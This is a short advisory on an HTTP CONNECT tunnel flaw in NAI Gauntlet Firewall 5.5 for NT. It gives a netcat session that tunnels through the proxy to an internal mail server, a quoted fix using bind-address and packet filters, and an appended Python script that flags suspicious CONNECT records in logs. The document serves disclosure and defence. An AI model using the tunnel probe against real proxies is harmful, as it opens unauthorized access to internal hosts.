COMMAND

    NAI Gauntlet Firewall HTTP CONNECT TCP Tunnel Vulnerability

SYSTEMS AFFECTED

    NAI Gauntlet Firewall 5.5 for NT

PROBLEM

    Rashed Alabbar reported that NAI Gauntlet Firewall is vulnerable to
    the HTTP CONNECT TCP Tunnel Vulnerability when acting as a proxy. See

        http://www.securitybugware.org/Other/5112.html

    for details about this vulnerability.

        Client              = x.x.x.x
        Gauntlet            = y.y.y.y
        Internal Mailserver = z.z.z.z

        nc -v -n y.y.y.y 80
        (UNKNOWN) [y.y.y.y] 80 (?) open
        CONNECT z.z.z.z:25 HTTP/1.0
        HTTP/1.0 200 OK
        mail server banner

SOLUTION

    Colin Campbell answered:

    It is (or at least I thought it was) well known that an http-gw in
    both Gauntlet and the fwtk should NEVER listen on the external
    address. On a Gauntlet system use the bind-address directive to make
    sure it doesn't listen. To be doubly sure set up the appropriate
    packet filters to stop incoming connections. On a fwtk system I
    don't recall the bind-address directive being present so I always
    used packet filters to block incoming connections.

    If you must "reverse proxy", use plug-gw. Better still put a proxy
    outside the firewall and plug it through the firewall to the real
    server.
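
A log-review check for the tunnel shown in the PROBLEM section, added here as an example that is not part of the original advisory or of Colin Campbell's answer: it flags CONNECT requests that arrive from outside the internal network or that target a port other than 443. The record layout, the internal address ranges, the port allowlist and all sample records are constructed assumptions, not Gauntlet's log format.

```python
import ipaddress

# Assumptions for this example (not from the advisory): the internal
# address space and the only port CONNECT is expected to reach.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "192.168.0.0/16")]
ALLOWED_CONNECT_PORTS = {443}

def is_internal(addr):
    """True if addr is a literal IP inside one of INTERNAL_NETS."""
    try:
        ip = ipaddress.ip_address(addr.strip("[]"))  # allow [v6] literals
    except ValueError:
        return False  # hostname: cannot be judged from the record alone
    return any(ip in net for net in INTERNAL_NETS)

def review_connect(client_ip, request_line):
    """Return the list of findings for one logged proxy request."""
    parts = request_line.split()
    if len(parts) != 3 or parts[0].upper() != "CONNECT":
        return []  # not a CONNECT request, out of scope here
    host, sep, port = parts[1].rpartition(":")
    if not sep or not port.isdigit():
        return ["malformed CONNECT target"]
    findings = []
    if not is_internal(client_ip):
        # http-gw answered a client on the outside interface.
        findings.append("proxy reachable from external client")
    if int(port) not in ALLOWED_CONNECT_PORTS:
        findings.append("tunnel to non-allowed port %s" % port)
    if is_internal(host) and not is_internal(client_ip):
        findings.append("external client tunnelled to internal host")
    return findings

# Constructed sample records: (client address, request line).
SAMPLE_LOG = [
    ("203.0.113.7", "CONNECT 10.0.0.25:25 HTTP/1.0"),       # case in the advisory
    ("10.0.0.14", "CONNECT www.example.com:443 HTTP/1.0"),  # normal outbound HTTPS
    ("10.0.0.14", "GET http://www.example.com/ HTTP/1.0"),  # plain proxy request
    ("10.0.0.31", "CONNECT 192.168.5.9:23 HTTP/1.0"),       # inside, odd port
]

def flagged(log=SAMPLE_LOG):
    """Records that produced at least one finding."""
    return [(c, r, f) for c, r in log if (f := review_connect(c, r))]

if __name__ == "__main__":
    for client, request, findings in flagged():
        print(client, request, "->", "; ".join(findings))
```

Any record carrying the first finding means the proxy is still answering on the external side, which is the condition the bind-address directive and packet filters in the answer above are meant to remove.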